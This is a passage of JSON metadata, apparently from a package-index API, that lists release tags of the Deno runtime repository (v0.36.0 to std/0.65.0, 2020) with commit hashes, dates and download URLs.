/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyst